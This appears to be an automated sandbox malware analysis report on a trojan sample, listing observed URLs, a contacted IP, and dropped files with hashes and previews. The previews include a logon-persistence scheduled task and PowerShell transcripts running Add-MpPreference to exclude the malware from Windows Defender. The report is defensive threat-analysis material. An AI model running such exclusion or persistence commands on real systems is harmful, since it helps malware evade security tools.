                            https://go.micropowershell.exe, 00000001.00000003.361866562.00000000052D1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://crl.microsztpowershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.tiro.comexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                              high
                              http://www.goodfont.co.krexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://crl.microsoft.powershell.exe, 00000007.00000003.422711035.0000000008CEA000.00000004.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000001.00000003.340504471.000000000095B000.00000004.00000001.sdmpfalse
                                high
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssMs5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.carterandcone.comlexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.sajatypeworks.comexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.typography.netDexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://fontfabrik.comexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cnexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://vbcity.com/forums/t/51894.aspxMs5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                        high
                                        http://www.jiyu-kobo.co.jp/explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8explorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                          high
                                          http://www.fonts.comexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                            high
                                            http://www.sandoll.co.krexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.urwpp.deDPleaseexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://www.zhongyicts.com.cnexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameMs5nQdSz5l.exe, 00000000.00000002.244358631.00000000030A1000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.439791337.00000000048F1000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.sakkal.comexplorer.exe, 0000000B.00000000.340228589.000000000BC36000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://github.com/MrCylopsMs5nQdSz5l.exe, Ms5nQdSz5l.exe, 00000009.00000000.239718276.0000000000622000.00000002.00020000.sdmp, mstsc.exe, 00000017.00000002.504404849.0000000004C22000.00000004.00000001.sdmpfalse
                                                high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                34.102.136.180
                                                safifinancial.infoUnited States
                                                15169GOOGLEUSfalse

                                                General Information

                                                Joe Sandbox Version:32.0.0 Black Diamond
                                                Analysis ID:404105
                                                Start date:04.05.2021
                                                Start time:18:00:08
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 13m 26s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Ms5nQdSz5l.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:32
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.evad.winEXE@19/19@2/1
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 9.4% (good quality ratio 8.3%)
                                                • Quality average: 71.1%
                                                • Quality standard deviation: 32.6%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .exe
                                                Warnings:
                                                Show All
                                                • Excluded IPs from analysis (whitelisted): 13.64.90.137, 104.42.151.234, 92.122.145.220, 52.255.188.83, 184.30.24.56, 2.20.142.210, 2.20.142.209
                                                • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net, au-bg-shim.trafficmanager.net
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                18:00:58API Interceptor2x Sleep call for process: Ms5nQdSz5l.exe modified
                                                18:01:47API Interceptor175x Sleep call for process: powershell.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                No context

                                                Domains

                                                No context

                                                ASN

                                                No context

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exeRefno.191938.xlsxGet hashmaliciousBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Ms5nQdSz5l.exe.log
                                                  Process:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:modified
                                                  Size (bytes):1314
                                                  Entropy (8bit):5.350128552078965
                                                  Encrypted:false
                                                  SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                  MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                  SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                  SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                  SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                  Malicious:true
                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):14734
                                                  Entropy (8bit):4.993014478972177
                                                  Encrypted:false
                                                  SSDEEP:384:cBVoGIpN6KQkj2Wkjh4iUxtaKdROdBLNXp5nYoGib4J:cBV3IpNBQkj2Lh4iUxtaKdROdBLNZBYH
                                                  MD5:8D5E194411E038C060288366D6766D3D
                                                  SHA1:DC1A8229ED0B909042065EA69253E86E86D71C88
                                                  SHA-256:44EEE632DEDFB83A545D8C382887DF3EE7EF551F73DD55FEDCDD8C93D390E31F
                                                  SHA-512:21378D13D42FBFA573DE91C1D4282B03E0AA1317B0C37598110DC53900C6321DB2B9DF27B2816D6EE3B3187E54BF066A96DB9EC1FF47FF86FEA36282AB906367
                                                  Malicious:false
                                                  Preview: PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):22288
                                                  Entropy (8bit):5.345016330366643
                                                  Encrypted:false
                                                  SSDEEP:384:NtCDvh366U7TE/3ETQ0GfSvVkNI1JN8nudTdvXhiDq1dPlV36SC:Ah3w7QV0GfuxXSudriqkv
                                                  MD5:1EBB1B5FB0B7ACC09F512DFE26626C2C
                                                  SHA1:497DDA1C651EB4BD8B9838A379E9A2AA83BE8CA8
                                                  SHA-256:C69DE25A9D02B569E35A2DA12DA18047DE3E9B5AC89E7A29FE7C857F84D51434
                                                  SHA-512:27F49A2DC205E89F8E5C464CA7C52F998E30B35933B9605832AC34AF999F45BD3FF13A0B7A5166278C834AD37AD36DCE4542ABDEC179454BA9D67443A6A1624A
                                                  Malicious:false
                                                  Preview: @...e...........}...........9.&.........B............@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ezrs2lx.0rw.ps1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ou42d2p.ttg.psm1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cojxddbh.ady.psm1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ezlnymm1.v0f.ps1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mw4rjusx.4te.ps1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_taqi1ccw.3sg.psm1
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:very short file (no magic)
                                                  Category:dropped
                                                  Size (bytes):1
                                                  Entropy (8bit):0.0
                                                  Encrypted:false
                                                  SSDEEP:3:U:U
                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                  Malicious:false
                                                  Preview: 1
                                                  C:\Users\user\AppData\Local\Temp\tmp7635.tmp
                                                  Process:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1651
                                                  Entropy (8bit):5.187829387108834
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqC/a7hTlNMFpH/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBPtn:cbhC7ZlNQF/rydbz9I3YODOLNdq3n
                                                  MD5:F535A1CF3963F9448B38B8A69C6686F9
                                                  SHA1:F31057609E3B939343C10350A6A00D69D78A794C
                                                  SHA-256:8F1062BA8F06B04A3BFD494B93BC1BE307B7EBF64855965E8BA6C39BA2071DA4
                                                  SHA-512:B5EFD180EB2C8525C8A73BBB82ADF4860EFB1225E4E9130191245A7ACBF3B02359588FBEED4C0924D5481A35DE4CBE72E1D3CFC45D5D9C205DBA1B79F975C0DF
                                                  Malicious:true
                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t
                                                  C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe
                                                  Process:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):734720
                                                  Entropy (8bit):7.525234190780704
                                                  Encrypted:false
                                                  SSDEEP:12288:OxIvnbBjqfKMpnc2FOAeqL6oPUxMnHIqKG6BcmKd4pC+sO6cHksc5w3sLj19nFY:OVHUxCHIqKG6Bw5yTc5yo19nF
                                                  MD5:BA01DF16E4C876E078348FD4479A8FDF
                                                  SHA1:6C7F20976D3E7D9BF9F8A410CBC54962D1EF52BB
                                                  SHA-256:8353E30C6566795DA3E5AA38A22B4707EE895CFA115FFA399CFBE7D57D00F91D
                                                  SHA-512:7D828277F9DFD39755B015CB25EE713159C2CF9D812EA938B408E0C21B9004B72D9EFA21DEF95DFA307838DB56558FD8E507AD10B887E1ED7CA1219A53E8747C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Joe Sandbox View:
                                                  • Filename: Refno.191938.xlsx, Detection: malicious, Browse
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.2...............P......L........... ... ....@.. ....................................@.....................................O.... ..,H..........................h................................................ ............... ..H............text........ ...................... ..`.rsrc...,H... ...J..................@..@.reloc...............4..............@..B........................H.......................P................................................0............(....(..........(.....o.....*.....................( ......(!......("......(#......($....*N..(....oU...(%....*&..(&....*.s'........s(........s)........s*........s+........*....0...........~....o,....+..*.0...........~....o-....+..*.0...........~....o.....+..*.0...........~....o/....+..*.0...........~....o0....+..*&..(1....*...0..<........~.....(2.....,!r...p.....(3...o4...s5............~.....
                                                  C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe:Zone.Identifier
                                                  Process:C:\Users\user\Desktop\Ms5nQdSz5l.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):26
                                                  Entropy (8bit):3.95006375643621
                                                  Encrypted:false
                                                  SSDEEP:3:ggPYV:rPYV
                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                  Malicious:true
                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                  C:\Users\user\Documents\20210504\PowerShell_transcript.414408.c0oGFjmQ.20210504180103.txt
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):5767
                                                  Entropy (8bit):5.383728622337322
                                                  Encrypted:false
                                                  SSDEEP:96:BZk/jN0GqDo1Z2aZo/jN0GqDo1ZG4J+JQJjZC/jN0GqDo1Zc5JAJAJbZ8:S
                                                  MD5:76A00F68B68E479F8371D52299EA90F6
                                                  SHA1:A7848A7795C197B06CA4B8532294F850D2D33E3F
                                                  SHA-256:1BD6E89EDF41C46DDBC23A0052157BF76794E9C72C86E83959876C79D9FBF682
                                                  SHA-512:9C7D34139454DD9E1D63A1F5AA90DBE4FAA90D5FA7C0F7BE505FF126057DC04AB15543EC7B62E78C9E7E2B542168B0BA4FC648AB078ADCE54F6D21AABDD149C6
                                                  Malicious:false
                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210504180131..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Ms5nQdSz5l.exe..Process ID: 6188..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210504180132..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\Ms5nQdSz5l.exe..**********************..Windows PowerShell transcript start..Start time: 20210504181059..Username: computer\user..RunAs User: computer\user..Configu
                                                  C:\Users\user\Documents\20210504\PowerShell_transcript.414408.wXuZe1kL.20210504180105.txt
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):5815
                                                  Entropy (8bit):5.407233157690023
                                                  Encrypted:false
                                                  SSDEEP:96:BZW/jNqqDo1ZbZ7/jNqqDo1ZDeI2jZ8/jNqqDo1Z+TGGdZO:N
                                                  MD5:CA8D4AA1CA34D612F4136A0BCF99E896
                                                  SHA1:F66B1CA38CD5EA53CA2FDA5D1B759ED6271B50B5
                                                  SHA-256:F656F3DB794414791EBA929B28713CC13D2D2611257E005A746729BBAD1EF66D
                                                  SHA-512:D1348AD0823A306B31D69B4EC504C3CDE49D9A15BAB832600065B925A5080E5C0CD78E060DDE46807FAE1AA429B54F26CD2A12631684D2711F4C360954E0AA32
                                                  Malicious:false
                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210504180133..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 414408 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..Process ID: 6208..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210504180134..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\zFVxYeAVOjnwuB.exe..**********************..Windows PowerShell transcript start..Start time: 20210504180923..Username: computer\user..RunAs User: DESKTOP
                                                  C:\Users\user\Documents\20210504\PowerShell_transcript.414408.zUtNgT0P.20210504180107.txt
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):5815
                                                  Entropy (8bit):5.406659293776376
                                                  Encrypted:false
                                                  SSDEEP:96:BZy/jNmqDo1ZYZ//jNmqDo1ZteI2jZ0/jNmqDo1ZoVTGGPZE:vw
                                                  MD5:3128F27F3B23CC5B6E47AB2DE5D6EEA7
                                                  SHA1:C888FF2E9AFDD554A3BA7D920070B93405853753
                                                  SHA-256:DD91D6BD384E5ACE1F47439FE463F3EB4D03DE78A537E038A7BDEF7B6B5A8DBB
                                                  SHA-512:12C21C1680ADFC68CA91F339842F726E08436E99FDF9F1AB2BD0FBB23E64E3591B176E1633FB7DA54BDE802E097C8EE909457D4AA20B89D3F39EBE311496B02E
                                                  Malicious:false
